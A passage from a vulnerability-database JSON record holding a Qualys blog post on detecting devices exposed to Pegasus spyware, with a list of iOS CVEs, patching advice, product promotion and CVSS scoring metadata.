"THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "href": "https://threatpost.com/safari-zero-day-linkedin/167814/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-07-28T14:34:25", "description": "Pegasus spyware is in the news, and it has been used to target devices of critical people from different sectors and countries including journalists, activists, politicians, and business executives. It has been said that a [leaked list of 50,000](<https://techcrunch.com/2021/07/19/toolkit-nso-pegasus-iphone-android/>) phone numbers of potential surveillance targets was obtained by Paris-based journalism nonprofit Forbidden Stories and Amnesty International.\n\nPegasus spyware is a surveillance software created by Israeli cyber intelligence firm NSO Group. Pegasus is one such software developed to gain access to your phone without consent and gather personal and sensitive information and deliver it to the user spying on you.\n\n### Attack Vectors and Impact of Pegasus Spyware\n\nThe first version of the spyware was detected in 2016 and used spear-phishing to infect a smartphone. It now adopts a different and more sophisticated approach for reaching new targets. It can infect a device using the "[zero-click](<https://www.aljazeera.com/news/2020/12/21/al-jazeera-journalists-hacked-by-spyware-sold-by-israeli-firm>)" attack done by exploiting the vulnerabilities present on the victim device. The "zero-click" attack happened earlier in December 2020 using iMessage vulnerabilities. Also, in [2019](<https://www.ft.com/content/4da1117e-756c-11e9-be7d-6d846537acab>) using the WhatsApp vulnerabilities.\n\nThe attack vectors for the Pegasus spyware are the vulnerabilities present on the devices: OS-level message (SMS) or iMessage app, WhatsApp, or other vulnerabilities that can be exploited.\n\nOnce Pegasus spyware is installed on the device, it can effectively monitor any activity you perform on it. This includes reading or copying your messages, extracting your media files, accessing your browser history, recording your calls, and much more.\n\n\n\n### VMDR for Mobile Devices Helps Protect from Pegasus Spyware\n\n[Qualys VMDR for Mobile Devices](<https://www.qualys.com/apps/vulnerability-management-detection-response/mobile-devices/>) detects devices that are potentially prone to Pegasus spyware based on the vulnerabilities mentioned below, which is a proactive approach. Pegasus is sophisticated spyware with anti-forensic and self-destruct features that make it difficult to detect. If it is uninstalled later, it does not leave any trace. VMDR for Mobile Devices must therefore detect if the device is vulnerable to Pegasus rather than detecting the presence of Pegasus spyware itself.\n\n#### iOS Pegasus:\n\nAll iOS devices are vulnerable to the following CVEs that are fixed in the latest iOS versions that might be used to install Pegasus spyware and to get the details from the devices\n\n * CVE-2020-9954, CVE-2020-9956, CVE-2020-9947, CVE-2020-9950, CVE-2020-9988, CVE-2020-9989, CVE-2020-9941 \u2013 Fixed in iOS and iPadOS 14\n * CVE-2020-10017, CVE-2020-27908, CVE-2020-27909 \u2013 Fixed in iOS and iPadOS 14.2\n * CVE-2020-29610 \u2013 Fixed in iOS and iPadOS 14.3\n * CVE-2021-1838, CVE-2021-1746, CVE-2021-1743, CVE-2021-1763, CVE-2021-1768, CVE-2021-1745, CVE-2021-1762, CVE-2021-1767, CVE-2021-1753, CVE-2021-1781 \u2013 Fixed in iOS 14.4\n * CVE-2021-1879 \u2013 Fixed in iOS and iPadOS 14.4.2\n * CVE-2021-30743, CVE-2021-1883 \u2013 Fixed in iOS 14.5\n * CVE-2021-30665, CVE-2021-30663, CVE-2021-30666(iOS 12.5.3), CVE-2021-30661(iOS 12.5.3) \u2013 Fixed in iOS and iPadOS 14.5.1 & iOS 12.5.3\n * CVE-2021-30707, CVE-2021-30749, CVE-2021-30734 \u2013 Fixed in iOS and iPadOS 14.6\n * CVE-2021-30788, CVE-2021-30759, CVE-2021-30792, CVE-2021-30791 \u2013 Fixed in iOS and iPadOS 14.7\n\n_Note that more CVEs might be exploited by Pegasus of the old iOS versions, i.e., below 14.0. If you are using old iOS versions, then your device might be more vulnerable to Pegasus spyware._\n\nWith VMDR for Mobile Devices, quickly check the security posture of all your mobile devices across your enterprise to remove blind spots, continuously detect these vulnerabilities and prioritize them. This helps you to take appropriate actions on the impacted devices.\n\n \n\n#### Android Pegasus:\n\nVMDR for Mobile Devices quickly detects and prioritizes all the WhatsApp vulnerabilities, other messaging app vulnerabilities, and OS vulnerabilities. Earlier, the attack of Pegasus was made through [WhatsApp](<https://www.whatsapp.com/security/advisories/2021/>) app vulnerabilities, i.e., the Pegasus spyware can be installed on the phone using these vulnerabilities.\n\n\n\n#### Respond by Patching and Remediation\n\nVMDR for Mobile Devices helps you to get a view of all vulnerabilities along with their priorities. Prioritizing the vulnerabilities based on the severity helps you take corrective and preventive actions on the impacted devices.\n\nVMDR for Mobile Devices provides you the patch orchestration for Android devices that helps you rapidly remediate your Android assets. Patch orchestration helps you initiate the most relevant per-application version patches on the affected assets.\n\nYou do not have to create multiple jobs; one job will take care of all vulnerabilities of that application.\n\n\n\nVMDR for Mobile Devices will also detect the app installed from an unknown source and its configurations (available by the end of August). The Pegasus may be introduced or installed through an unknown source in Android and ask the user for the required permission to monitor activities.\n\n\n\nIn addition, VMDR for Mobile Devices detects all vulnerabilities of Android and iOS OS vulnerabilities fixed by Apple and Google in their security updates. These vulnerabilities lead Pegasus spyware to take control of the device.\n\nKeep an eye on the vulnerabilities detected by VMDR for Mobile Devices and take appropriate actions. That will help you to secure the devices from Pegasus spyware because the spyware can be installed only if the vulnerabilities are present on the device.\n\nAlso, if the devices are jailbroken or rooted, track them through the \u201cUnauthorized Root Access\u201d widget or use QQL (Qualys Query Language) \u2013 \u201casset.hasUnauthorizedRootAccess: Yes\u201d to find the compromised devices.\n\n\n\n### Get Started Now\n\n[Qualys VMDR for Mobile Devices](<https://www.qualys.com/apps/vulnerability-management-detection-response/mobile-devices/>) is available free for 30 days to help customers detect vulnerabilities, monitor critical device settings, and correlate updates with the correct app versions available on Google Play Store. You can try our solution by [registering for a free 30-day trial](<https://www.qualys.com/apps/vulnerability-management-detection-response/mobile-devices/>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-23T16:31:38", "type": "qualysblog", "title": "Protect your Devices from Pegasus Spyware using VMDR for Mobile Devices\u2019 Proactive Approach", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30792", "CVE-2020-9954", "CVE-2021-1753", "CVE-2021-1879", "CVE-2021-1763", "CVE-2020-9988", "CVE-2021-1743", "CVE-2021-30665", "CVE-2021-1762", "CVE-2020-9950", "CVE-2021-30734", "CVE-2021-30749", "CVE-2020-27909", "CVE-2021-1767", "CVE-2021-30661", "CVE-2020-9989", "CVE-2021-30788", "CVE-2021-1768", "CVE-2020-29610", "CVE-2021-1883", "CVE-2020-9941", "CVE-2021-1746", "CVE-2020-9956", "CVE-2021-1745", "CVE-2020-27908", "CVE-2021-30743", "CVE-2021-1781", "CVE-2020-9947", "CVE-2021-30663", "CVE-2021-30759", "CVE-2020-10017", "CVE-2021-1838", "CVE-2021-30707", "CVE-2021-30791", "CVE-2021-30666"], "modified": "2021-07-23T16:31:38", "id": "QUALYSBLOG:70AF718BCABA36D5847184CA639B55C9", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
